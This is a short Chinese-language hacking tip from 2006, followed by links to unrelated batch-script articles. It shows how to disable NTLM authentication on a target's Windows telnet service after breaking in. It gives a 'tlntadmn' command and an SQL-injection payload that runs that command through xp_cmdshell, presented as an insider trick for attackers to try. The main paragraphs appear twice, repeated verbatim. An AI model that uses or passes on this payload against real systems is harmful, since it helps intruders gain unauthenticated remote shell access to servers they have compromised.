一個(gè)小技巧 ntlm
更新時(shí)間:2006年09月07日 00:00:00 作者:
相信大家都對telnet比較熟悉吧。hacking的時(shí)候經(jīng)常用到的系統(tǒng)自帶shell尤其是注射的時(shí)候,但是最討厭的就是ntlm認(rèn)證了,以前大家去掉ntlm的方法一般有2種。
1 上傳ntml.exe 這種方法有很多缺點(diǎn),比如:對方有殺毒軟件,很多網(wǎng)段屏蔽了TFTP.
2 直接寫入telnet的配置信息到文本中然后在用shell執(zhí)行。 這種辦法非常麻煩。
今天我給大家介紹我一直在使用的辦法,壓箱底的哦。
那就是直接運(yùn)行命令:tlntadmn config sec = -ntlm
注射的話可以直接運(yùn)行:;exec master.dbo.xp_cmdshell 'tlntadmn config sec = -ntlm'--
運(yùn)行以后就去掉了該死的ntlm認(rèn)證:) 趕快去試試吧。
1 上傳ntml.exe 這種方法有很多缺點(diǎn),比如:對方有殺毒軟件,很多網(wǎng)段屏蔽了TFTP.
2 直接寫入telnet的配置信息到文本中然后在用shell執(zhí)行。 這種辦法非常麻煩。
今天我給大家介紹我一直在使用的辦法,壓箱底的哦。
那就是直接運(yùn)行命令:tlntadmn config sec = -ntlm
注射的話可以直接運(yùn)行:;exec master.dbo.xp_cmdshell 'tlntadmn config sec = -ntlm'--
運(yùn)行以后就去掉了該死的ntlm認(rèn)證:) 趕快去試試吧。
相關(guān)文章
Windows設(shè)置開機(jī)自啟動(dòng)bat腳本
讓W(xué)indows開機(jī)自啟動(dòng),可以通過一個(gè)腳本來實(shí)現(xiàn),如果直接開機(jī)啟動(dòng)該腳本會(huì)彈出一個(gè)黑框,我們希望能后臺(tái)執(zhí)行它,喜歡的朋友可以參考下2014-01-01批處理 實(shí)現(xiàn)定時(shí)關(guān)機(jī)、注銷、重啟、鎖定等功能
一個(gè)可以實(shí)現(xiàn)電腦定時(shí)關(guān)機(jī)、注銷、重啟、鎖定等功能的腳本代碼,打擊可以看下好多功能是利用了系統(tǒng)的一些命令。大家可以自由的擴(kuò)展。2009-07-07一鍵設(shè)置java 環(huán)境變量 cmd下查看、修改(覆蓋與添加)等說明
這篇文章主要介紹了cmd設(shè)置環(huán)境變量的、查看、修改(覆蓋與添加)等說明,需要的朋友可以參考下2018-01-01比較詳細(xì)的手把手教你寫批處理(willsort題注版)
Climbing 兄可謂用心良苦,受其感昭,略緊微薄之力;原文內(nèi)容一字未易,僅于每段之下另加題注,其文大多非為糾錯(cuò),多是年來體會(huì),或偶得,或漸悟,未免偏頗;又加近來俗事漸多,閑情愈少,心浮氣燥,一蹴而就。義理悖逆,敬請斧正;措辭不當(dāng),尚請莫怪。2008-09-09